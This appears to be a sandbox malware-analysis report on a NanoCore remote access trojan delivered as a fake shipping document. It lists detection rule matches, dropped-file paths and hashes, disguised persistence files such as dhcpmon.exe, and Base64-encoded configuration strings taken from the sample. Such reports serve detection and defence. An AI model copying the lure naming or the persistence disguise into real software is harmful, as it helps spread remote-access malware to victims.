Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.Icda.exe.56d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Consignment Document PL&BL Draft.exe

Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_0529131A NtQuerySystemInformation,		3_2_0529131A
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_052912DF NtQuerySystemInformation,		3_2_052912DF

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 0_2_015EC0F4	0_2_015EC0F4
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 0_2_015EE538	0_2_015EE538
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 0_2_015EE528	0_2_015EE528
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 0_2_076D0040	0_2_076D0040
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_0167E408	1_2_0167E408
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_0167E418	1_2_0167E418
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_0167B7BC	1_2_0167B7BC
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_00A4524A	3_2_00A4524A
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_0523B068	3_2_0523B068
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_05233850	3_2_05233850
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_052323A0	3_2_052323A0
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_05232FA8	3_2_05232FA8
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_05238798	3_2_05238798
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_0523306F	3_2_0523306F
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_0523945F	3_2_0523945F
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_05239398	3_2_05239398
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_004E2296	5_2_004E2296
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A16070	5_2_00A16070
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A17078	5_2_00A17078
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A1085D	5_2_00A1085D
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A15698	5_2_00A15698
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A133E0	5_2_00A133E0
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A19FC8	5_2_00A19FC8
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A1EB00	5_2_00A1EB00
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_00A16F80	5_2_00A16F80
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_026D46A0	5_2_026D46A0
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_026D45B0	5_2_026D45B0
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_026DD2E1	5_2_026DD2E1
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_05A67538	5_2_05A67538
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_05A66C68	5_2_05A66C68
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_05A66920	5_2_05A66920
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Code function: 5_2_05A690F8	5_2_05A690F8

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe C0791632452FD17FDB08B4241AD7B6F5AAF1AF6190861301135EF3631F4B4020
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Icda.exe 9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 488C59FDDF2DB00DA7FB4D6589183ADC7396EDC4233F23EB950AA7191FE4366E
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 97A5CAB2336F3B81F82D7EC85B2F0937CE39D10E512BF0BDADE9248D6D1BC682

Source: Consignment Document PL&BL Draft.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Consignment Document PL&BL Draft.exe	Binary or memory string: OriginalFilename vs Consignment Document PL&BL Draft.exe
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename3in1.exe4 vs Consignment Document PL&BL Draft.exe
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameB2B.exe4 vs Consignment Document PL&BL Draft.exe
Source: Consignment Document PL&BL Draft.exe	Binary or memory string: OriginalFilename vs Consignment Document PL&BL Draft.exe
Source: Consignment Document PL&BL Draft.exe, 00000001.00000002.243408659.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameVLC22.exe4 vs Consignment Document PL&BL Draft.exe
Source: Consignment Document PL&BL Draft.exe, 00000001.00000002.240881218.000000000044A000.00000040.00000001.sdmp	Binary or memory string: OriginalFilename3in1.exe4 vs Consignment Document PL&BL Draft.exe
Source: Consignment Document PL&BL Draft.exe	Binary or memory string: OriginalFilename vs Consignment Document PL&BL Draft.exe

Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.Icda.exe.56d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.Icda.exe.56d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: Consignment Document PL&BL Draft.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Rczgwoxvqzh.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Icda.exe.1.dr	Static PE information: Section: .rsrc ZLIB complexity 0.99953125
Source: dhcpmon.exe.3.dr	Static PE information: Section: .rsrc ZLIB complexity 0.99953125

Source: Icda.exe.1.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Icda.exe.1.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.3.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: dhcpmon.exe.3.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Isgeprf.exe.2.dr, Client/Settings.cs

Base64 encoded string: 'Nw1gtYqph0wLf4EXfBAJrH13qgT+guhDJrXnvIW+nyGiHgFnrWIVAVu+8pH2/eNsYPgHWB8yrlojcqOT7NUTHA==', 'uVc1tfiTCefsUt1aAeD+CBRJeU/+t9XadzdMMojJf1QAWGDpYh4K5FgT4Np/5j/ObtZPu0Q+8Is6xYyKJ8H+kppYMXkCHQg1DfQS6lcdHsw=', 'hB9frLvaIqvykz6iknlNjnH13y6iI0FI9B46TAb7ves0qOkf9TUsZX9LS+My5+FF4RFPAVcY90ENqkxjxbAhhw==', 'p0fhD58xJ4CrL6CmIoTtkCGx9oXDd7a7H3Pjstxalpcn0/sYBbmJUs73TCckU+b0DPBY4FYQa/FvDvp6q77sf9rwUrUjZAXfNl7g9IHUA8M=', 'XKIB3EO4GfPyDFEhS9sxDEhzvvJJ1fkcfKzxZz71Jdkn6hiqo4k2LP5FIuGQUOUgNDNySPWv7SlnarnvL3qN10qpqpBm2DvL8L1Y3INOvpaW3GiDoMan+dzWdXKvfBvvFd2FqT1mf+7I8xvfTuLKiUoGuQ308Czc5rgXqvyRL8DbDpOhedN0isvriO67V+rkVWrT3eb6tMcSWfR1Rf1UgEvnShP8Z5MEGFBLXrZTyux5PDtLgoUANx2wQm3dEeW27pKE737Jc918BnxduVMyw159hW/FoGvCBopaQxGjn0dq0wXL7f3UQuz2hrNYyQVejjwSlW/+pK4JZbqkwcIPKbgUoVfdYZZjCXaE8Tkm6sRQen+r2ieaJlqU//3wpOXTq3pfjk7QLV6Lgmp47mB2f37nki7JvQ0SP6lNMt4aHl83plNeiRAC7EWBQp4oA7PANn+O1yA+kC4GDlV2Df7b468bCiY2oPssmNL+DKm/01PDKQ10z8CfEMr4gmls+Er0A9wbipcoDoDKALpXjqeQgj8oOR+nUC4UA0uI+bE2q8pqrNTkGsRdW794kbxJOp01utvOosMgXTdV0diKJ7cWtZIruE4E7atczDA9Wng/fOyUe4PVVpLjTYY6mcHGbit2RP1nempHvRZtM4drqJIpqwUkmM6M0T1YA2hlpvDwHZZ988GyKgp468yG3//dwdnNALmeRiZqAI/H9BkBip1kq4WBhHILIk8wH29+hVu4bjTq5V/bhWjxOaGpox6rZuV5O5OM48Cn7kFGxGk+bdYGIFkctESVmHQRcrkPA0CiKh8kssHtDeSDsCqStaFeqH1fsOX05GYBA4G6mpNLh7w+Cim83x/4CCdKszW2yAwhdMVUEvUDTLYNOxnN5+92RTlXFWLeDl0PbSyeZRjYjQyvsxQndZ5j1MFbj6aVVoBhJ/ji5UEJCxndIowYjG3voIHi8cFE0y2M4v6MAGcu8KFKeXFkt4NmNeaXXfBABENVFRTHEYBI9lIqbHQDY4dE+r3vRBHpTqJZ3UjbC2IRracsnVtSgiDPGzOQqV3sRoueTQf9M1pdEaMkWuQ9UQJz3TZ9goZLgVY7YIhd1w/o1ursdvN899B/cnZE65jfbS07Bhf3rG2V0oJ3vM0OIfvDDJ+LSbYiTWSFMxITAANsaVR2OXbNnvSqwOub6JpcImVbfoyATGv2Yp238mP